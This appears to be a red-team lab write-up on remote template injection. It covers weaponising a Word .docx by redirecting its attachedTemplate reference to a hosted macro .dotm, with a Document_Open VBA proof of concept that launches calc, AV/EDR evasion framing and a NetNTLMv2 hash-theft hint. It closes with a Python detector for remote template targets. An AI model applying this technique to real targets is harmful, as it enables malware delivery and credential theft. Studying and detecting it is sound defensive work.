# Inject Macros from a Remote Dotm Template

This lab shows how it is possible to add a macro payload to a .docx file indirectly, via a remote template reference, which has a good chance of evading some AVs/EDRs because the .docx itself contains no macro code.

This technique works in the following way:

1. A malicious macro is saved in a Word template .dotm file
2. Benign .docx file is created based on one of the default MS Word Document templates
3. Document from step 2 is saved as .docx
4. Document from step 3 is renamed to .zip
5. Document from step 4 gets unzipped
6. `.\word\_rels\settings.xml.rels` contains a reference to the template the document was created from. That reference gets replaced with a reference to our malicious macro template created in step 1. The template file can be hosted on a web server (http) or on WebDAV/SMB (UNC path).
7. File gets zipped back up again and renamed to .docx
8. Done

## Weaponization

Alt+F8 to enter Dev mode where we can edit Macros, select `ThisDocument` and paste in:

{% code title="Doc3.dotm" %}

```vba
' Runs automatically when the document (or the template it is attached to) is opened.
Sub Document_Open()

    ' Proof-of-concept payload: launch the calculator via WScript.Shell
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc"

End Sub
```

{% endcode %}

![](/files/-LaHsr9Df6zSyClDXreO)

Create a benign .docx file based on one of the provided templates and save it as .docx:

![](/files/-LaHtw6A6pSqS8yRT_4D)

Rename legit.docx to legit.zip:

![](/files/-LaHuXVOCz0pu04UlGl4)

Unzip the archive and edit `word\_rels\settings.xml.rels`:

{% code title="word\_rels\settings.xml.rels" %}

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
                Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
                Target="file:///C:\Users\mantvydas\AppData\Roaming\Microsoft\Templates\Polished%20resume,%20designed%20by%20MOO.dotx"
                TargetMode="External"/>
</Relationships>
```

{% endcode %}

Note that the `attachedTemplate` relationship specifies the target template here:

![](/files/-LaHwmHfhmC9WmqXqAi0)

Upload the template created previously, `Doc3.dotm`, to an SMB server (note that the file could be hosted on a web server also!).

Update `word\_rels\settings.xml.rels` so that the `Target` attribute points to Doc3.dotm:

![](/files/-LaI0x6LlzkBHXCcae2k)

Zip all the files of the `legit` archive and rename it back to .docx - we now have a weaponized document:

![](/files/-LaI2n9iw2zGOJSlqKFI)

{% hint style="info" %}
Note that this technique could be used to steal NetNTLMv2 hashes since the target system is connecting to the attacking system - a responder can be listening there.
{% endhint %}
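From the defender's side, the whole technique hinges on one artifact: an `attachedTemplate` relationship in `word\_rels\settings.xml.rels` whose `Target` points off the local disk. The following Python script is an added example (not part of the original lab or the ired.team project) that unzips a .docx in memory, walks every `.rels` part, and flags attached-template targets that use http(s), a `file://host/...` URL or a UNC path. The `build_sample_docx` helper constructs a minimal stand-in .docx for offline testing; the `192.0.2.10` address in the sample is a constructed TEST-NET value, not a real host.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Relationship type that links a document to the template it was created from
# (the relationship shown on this page in word/_rels/settings.xml.rels).
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def is_remote_target(target: str) -> bool:
    """True for http(s) URLs and UNC/WebDAV-style paths; False for local file paths."""
    if target.startswith("\\\\"):          # \\server\share\Doc3.dotm
        return True
    parsed = urlparse(target)
    if parsed.scheme in ("http", "https"):
        return True
    # file:///C:\... has an empty netloc (local); file://server/share has a host (remote)
    if parsed.scheme == "file":
        return bool(parsed.netloc)
    return False


def find_remote_templates(docx_bytes: bytes) -> list[dict]:
    """Return every attachedTemplate relationship whose Target is remote.

    A .docx is a zip archive. Word resolves the attached template when the
    document is opened, so a remote Target means code from another host can
    be pulled in even though the .docx itself carries no macros.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Check every .rels part, not only settings.xml.rels, to avoid misses.
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{RELS_NS}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if is_remote_target(target):
                    findings.append({"part": name, "id": rel.get("Id"), "target": target})
    return findings


def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx containing only the parts this check needs (hypothetical helper)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # placeholder part
        zf.writestr("word/document.xml", "<w:document/>")  # placeholder part
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Benign document: template lives in the user's local Templates folder.
    local = build_sample_docx(
        "file:///C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\Polished%20resume.dotx"
    )
    # Suspicious document: template is fetched from a web server (constructed sample).
    remote = build_sample_docx("http://192.0.2.10/Doc3.dotm")
    print("local :", find_remote_templates(local))
    print("remote:", find_remote_templates(remote))
```

The same check works on a real file with `find_remote_templates(open("legit.docx", "rb").read())`. In a mail gateway or sandbox pipeline, any hit is worth blocking or detonating: a legitimately created document almost always references a template under the user's local `Templates` folder, as the `file:///C:\...` target earlier on this page shows.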

## References

{% embed url="http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" %}
